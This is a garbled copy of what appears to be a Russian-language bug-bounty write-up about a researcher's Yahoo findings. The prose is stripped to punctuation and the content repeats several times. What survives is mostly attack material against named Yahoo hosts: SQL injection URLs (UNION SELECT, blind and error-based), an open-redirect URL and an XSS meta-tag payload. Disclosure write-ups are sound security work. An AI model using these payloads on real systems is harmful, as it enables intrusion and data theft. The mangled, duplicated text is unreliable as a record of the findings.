ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

                               . 
      

        
        
        
      

        ,        XSS. 
      

        
        
        
      

     
      

        
        
        
      

      . SQLi  *.sports.yahoo.com. 
      

        
        
        
      

      .       
      

        
        
        
      

     http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711 
      

        
        
        
      

           .  ,    race .    ,   ,   .   ,    "<"  ">".   -  BETWEEN   . Union select  .     -   username@% -    IP.           -    ,  ,  . - ,  ,   . , -, ,       SQLi-,    .   : 
      

        
        
        
      

     sports.yahoo.com/golf/pga/schedule?season=2013 
      

        
        
        
      

     sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013 
      

        
        
        
      

     sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012 
      

        
        
        
      

     sports.yahoo.com/golf/lpga/schedule?season=2012 
      

        
        
        
      

     sports.yahoo.com/golf/champions/schedule?season=2012 
      

        
        
        
      

     sports.yahoo.com/golf/web.com/schedule?season=2013 
      

        
        
        
      

     sports.yahoo.com/golf/european/schedule?season=2013 
      

        
        
        
      

     sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012 
      

        
        
        
      

     : 
      

        
        
        
      

     sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23 
      

        
        
        
      

     sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013 
      

        
        
        
      

     sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR 
      

        
        
        
      

     sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29 
      

        
        
        
      

     ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting 
      

        
        
        
      

     ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting 
      

        
        
        
      

     ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting 
      

        
        
        
      

     ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0 
      

        
        
        
      

     ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013 
      

        
        
        
      

     ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013 
      

        
        
        
      

     sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29 
      

        
        
        
      

     : 
      

        
        
        
      

     sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013 
      

        
        
        
      

     : 
      

        
        
        
      

     racing.fantasysports.yahoo.com/auto/expertpicks?week=35 
      

        
        
        
      

     racing.fantasysports.yahoo.com/auto/playerdistribution?week=35 
      

        
        
        
      

        (stat1/2): 
      

        
        
        
      

     baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013 
      

        
        
        
      

     football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013 
      

        
        
        
      

     baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1 
      

        
        
        
      

     basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012 
      

        
        
        
      

     basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1 
      

        
        
        
      

        : 
      

        
        
        
      

     - Union select - - , - . 
      

        
        
        
      

     -       ,       USERNAME@% 
      

        
        
        
      

     -   @@hostname  ,     40+ .           MySQL.          .           ,        .           .      . 
      

        
        
        
      

     -   ,     year=postseason_2013      information_schema,       .      ,      hex,   -  . 
      

        
        
        
      

     
      

        
        
        
      

         : 
      

        
        
        
      

     racing.fantasysports.yahoo.com/auto/playerdistribution?week=35 
      

        
        
        
      

        UNION SELECT: 
      

        
        
        
      

     http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2 
      

        
        
        
      

           .     -     ,       ,       . ,   ,       UNION   "  -  ".  : 
      

        
        
        
      

     union select 1, ord(substr(user(),1,1))/100,1
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     
      

        
        
        
      

              . 
      

        
        
        
      

     
      

        
        
        
      

          : 
      

        
        
        
      

      
      

        
        
        
      

          SQL    .   . 
      

        
        
        
      

     
      

        
        
        
      

      . Open redirect  m.yahoo.com. 
      

        
        
        
      

        m.yahoo.com,      (      : dark side of reproduce this bug ),        : 
      

        
        
        
      

     Welcome to Yahoo 
      

        
        
        
      

     Thanks for signing in! 
      

        
        
        
      

     It looks like you customized your Home Page before you signed in. What would you like to do? 
      

        
        
        
      

     [radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview 
      

        
        
        
      

         "Not sure".   POST-  : 
      

        
        
        
      

     m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en 
      

        
        
        
      

        Firebug'      GET: 
      

        
        
        
      

     m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS 
      

        
        
        
      

       -      .     , ,  POST-,    $_POST    $_REQUEST .    XSS,    done ,       ,  ""  ycb    : 
      

        
        
        
      

     http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED 
      

        
        
        
      

     
      

        
        
        
      

      ,    ,     : "   ?!".     Yahoo  394 . 
      

        
        
        
      

     
      

        
        
        
      

      . SQLi  hk.promotion.yahoo.net. 
      

        
        
        
      

        .    ,    ,    yahoo.net   .    ,  .   -  .     . 
      

        
        
        
      

     
      

        
        
        
      

          , error-based SQLi: 
      

        
        
        
      

     http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928 
      

        
        
        
      

     
      

        
        
        
      

      ,   . XSS  info.yahoo.com. 
      

        
        
        
      

          (    ). 
      

        
        
        
      

     http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390 
      

        
        
        
      

     
      

        
        
        
      

       -       ,  .   -      . 
      

        
        
        
      

      
      

        
        
        
      

             .    http  https.   ,  ,  ,  ,   meta- og:title  og:description .         meta- : 
      

        
        
        
      

     <meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/> 
      

        
        
        
      

       XSS.      .        XSS,   Chrome,    . 
      

        
        
        
      

     
      

        
        
        
      

     . 
      

        
        
        
      

          ,    Yahoo.         .      .      ,    . 
      

        
        
        
      

     
      

        
        
        
      

      . 
      

        
        
        
      

         finance.yahoo.com.   ,  UNION SELECT SQLi c  .    : 
      

        
        
        
      

     21.11 -    
      

        
        
        
      

     25.11 -   
      

        
        
        
      

     27.11 - : "  ,   " 
      

        
        
        
      

     27.11 -    -  . 
      

        
        
        
      

     2.12 - : "         ,     ." 
      

        
        
        
      

     "WTF?!!!" -  .    . 
      

        
        
        
      

     10.12 -        .  , , ,     : ",                   .             ." 
      

        
        
        
      

              ,  Yahoo  XSS  SQLi    "        ": 
      

        
        
        
      

      
      

        
        
        
      

      ,     ,           . ,  ,     . 
      

        
        
        
      

     
      

        
        
        
      

      ,  ,    ,  ,     ,     -10     Yahoo - Wall of Fame . 
      

        
        
        
      

     
      

        
        
        
      

        -    : hackerone.com/4lemon . 
      

        
        
        
      

     
      

        
        
        
      

     PS.        .        . ,  HackerOne    ,      .   - Yahoo      10 .
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

